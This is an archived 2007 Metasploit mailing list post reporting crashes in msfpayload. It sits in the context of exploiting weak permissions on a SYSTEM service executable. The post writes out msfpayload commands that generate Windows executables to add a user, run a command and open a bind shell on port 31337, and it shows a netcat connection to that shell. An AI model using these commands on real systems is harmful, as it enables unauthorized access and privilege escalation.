Metasploit mailing list archives
Bugs in msfpayload
From: nicob at nicob.net (Nicob)
Date: Wed, 05 Sep 2007 07:58:14 +0200
Hello ! [=] Bug report : I recently tried to use msfpayload to exploit some weak ACL on the EXE used by a SYSTEM service (something like [1]). The following tests were done on two distincts Windows XP SP2 French, as an unprivilegied user and as an admin (msfpayload from trunk 5080, running on Linux) : 1) msfpayload windows/adduser USER=toto PASS=titi X > adduser_toto_titi.exe When executed : Access violation when reading [C2A353BE] 2) msfpayload windows/exec CMD="cmd /c dir c:\ > c:\out.txt" X > exec_dir_c.exe When executed : Access violation when reading [C2A353BE] 3) msfpayload windows/shell/bind_tcp LPORT=31337 X > bind_tcp_31337.exe When executed, port is binded but the app crashs at the first command connection : C:\> nc -vn 127.0.0.1 31337 (UNKNOWN) [127.0.0.1] 31337 (?) open dir [ crash : Access violation when writing to [00000004] ] C:\> But using the "C" option of msfpayload and inserting it in a small skeleton (like [2]) is working. [=] Questions : 1) Is this bug known, am I missing something ? 2) Is it possible to add to the windows/adduser payload an option allowing to select a given group to which add the user ? Something like the patch posted by Jerome in May [3]. 3) How to use a skeleton like [2] with a two-stages payload like "msfpayload windows/shell/bind_tcp C" ? [=] Links : 1:http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-cisco-vpn-client-cvpndexe/ 2:http://seclists.org/fulldisclosure/2005/Dec/1286.html 3:http://www.metasploit.com/archive/framework/msg02188.html Regards, Nicob
Current thread:
- Bugs in msfpayload Nicob (Sep 04)
- Bugs in msfpayload Patrick Webster (Sep 05)
- Bugs in msfpayload H D Moore (Sep 05)
- Bugs in msfpayload Nicob (Sep 05)